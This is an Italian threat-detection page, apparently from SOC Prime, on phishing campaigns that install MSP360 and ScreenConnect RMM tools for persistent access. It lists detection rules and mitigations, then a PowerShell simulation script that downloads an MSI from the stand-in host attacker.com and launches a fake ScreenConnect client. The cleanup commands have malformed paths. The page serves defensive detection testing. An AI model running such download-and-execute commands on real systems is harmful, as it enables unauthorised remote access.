SOC Prime Bias: High

01 Oct 2026 08:13 UTC

Abusi di Phishing su Strumenti RMM per Accesso Persistente

Author Photo
SOC Prime Team linkedin icon Segui
Abusi di Phishing su Strumenti RMM per Accesso Persistente
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

Gli attori delle minacce stanno sfruttando campagne di phishing per distribuire un legittimo installer MSP360 RMM mascherato da software affidabile. Una volta avviato, l’installer stabilisce la persistenza e successivamente scarica e distribuisce ConnectWise ScreenConnect, fornendo agli attaccanti un ulteriore canale di accesso remoto. Ciò consente ulteriori attività post-compromissione, inclusi il furto di credenziali e la raccolta di dati sensibili.

Indagine

Gli esperti di Microsoft Defender hanno identificato diversi esche di phishing che impersonano Zoom, Adobe e inviti a riunioni legittime per distribuire MSP360 v2.5.0.67. I ricercatori hanno ricostruito la catena di infezione, tracciando l’esecuzione iniziale dell’utente e l’elevazione UAC tramite l’installazione del servizio e la distribuzione di strumenti RMM secondari. L’indagine ha anche rivelato che gli attaccanti abusano di piattaforme cloud affidabili, tra cui Amazon S3 e Dropbox, per ospitare carichi dannosi.

Mitigazione

Le organizzazioni dovrebbero controllare rigorosamente gli strumenti RMM approvati implementando l’MFA e le politiche di Controllo delle Applicazioni per prevenire installazioni non autorizzate. Regole di blocco basate su certificati possono ulteriormente limitare applicazioni firmate specifiche. Rafforzare le difese degli endpoint tramite antivirus basato su cloud e le regole di Riduzione della Superficie di Attacco è essenziale per ridurre l’esposizione.

Risposta

Quando vengono scoperte installazioni RMM non autorizzate, i team di sicurezza dovrebbero immediatamente reimpostare le credenziali associate alle installazioni dei servizi interessati. La sospetta compromissione degli account a livello di sistema richiede un’indagine approfondita per determinate la completa portata dell’attacco. Rivedere i registri di rilevamento degli endpoint per identificare sessioni di gestione remota sospette e attività post-compromissione correlate.

Flusso d’attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

Download o Upload tramite Powershell (via cmdline)

Team SOC Prime
30 Set 2026

Esecuzione di Cambio Codice Insolito (via cmdline)

Team SOC Prime
30 Set 2026

Software Alternativo di Accesso/Management Remoto (via process_creation)

Team SOC Prime
30 Set 2026

Chiamare Metodi .NET Sospetti da Powershell (via powershell)

Team SOC Prime
30 Set 2026

Comando e Controllo Sospetto da Richiesta DNS con Dominio di Primo Livello Insolito (TLD) (via dns)

Team SOC Prime
30 Set 2026

IOC (HashSha256) per rilevare: Abusi di Phishing Strumenti RMM per Accesso Persistente

Regole AI SOC Prime
30 Set 2026

IOC (HashSha1) per rilevare: Abusi di Phishing Strumenti RMM per Accesso Persistente

Regole AI SOC Prime
30 Set 2026

Rileva Invoke-WebRequest di PowerShell per il Download di Pacchetti MSI Remoti [Windows Powershell]

Regole AI SOC Prime
30 Set 2026

Abusi di Phishing Strumenti RMM per Accesso Persistente [Creazione Processi Windows]

Regole AI SOC Prime
30 Set 2026

Esecuzione di Simulazione

  • Narrativa & Comandi dell’Attacco: Un avversario avvia una campagna di spear phishing. La vittima clicca un link che attiva una riga singola di comando PowerShell. Questo comando usa Invoke-WebRequest per scaricare ClientSetup.msi (simulando l’installer ScreenConnect) da un server remoto. Una volta scaricato, l’attaccante esegue il MSI, e l’ultimo passaggio della simulazione comporta l’avvio di ScreenConnect.WindowsClient.exe per simulare la sessione di accesso remoto stabilita. Questa sequenza è progettata per attivare la selezione_2 E selezione_3 logica della regola.

  • Script di Test di Regressione:

    # Simulazione del Dispiegamento di RMM basato su Phishing
    $tempDir = $env:TEMP
    $msiName = "ClientSetup.msi"
    $exeName = "ScreenConnect.WindowsClient.exe"
    $msiPath = Join-Path $tempDir $msiName
    $exePath = Join-Path $tempDir $exeName
    
    # 1. Simula il download di PowerShell (parte A della Selezione 2)
    Write-Host "[+] Simulazione del download di MSI via PowerShell..."
    # Utilizzo di un file falso per simulare il download MSI
    New-Item -Path $msiPath -ItemType File -Force
    
    # Questo comando corrisponde alla logica di 'Invoke-WebRequest' e 'ClientSetup.msi' della regola
    powershell.exe -Command "Invoke-WebRequest -Uri 'http://attacker.com/ClientSetup.msi' -OutFile '$msiPath'"
    
    # 2. Crea un eseguibile falso per simulare il client ScreenConnect (Selezione 3)
    Write-Host "[+] Creazione di un eseguibile falso ScreenConnect..."
    New-Item -Path $exePath -ItemType File -Force
    
    # 3. Esegui il client (Selezione 3 e completamento della Selezione 2)
    Write-Host "[+] Esecuzione del Client ScreenConnect..."
    Start-Process -FilePath $exePath
  • Comandi di Pulizia:

    # Rimuovere gli artefatti di simulazione
    Remove-Item -Path "$env:TEMPClientSetup.msi" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPScreenConnect.WindowsClient.exe" -Force -ErrorAction SilentlyContinue
    Write-Host "[+] Pulizia completata."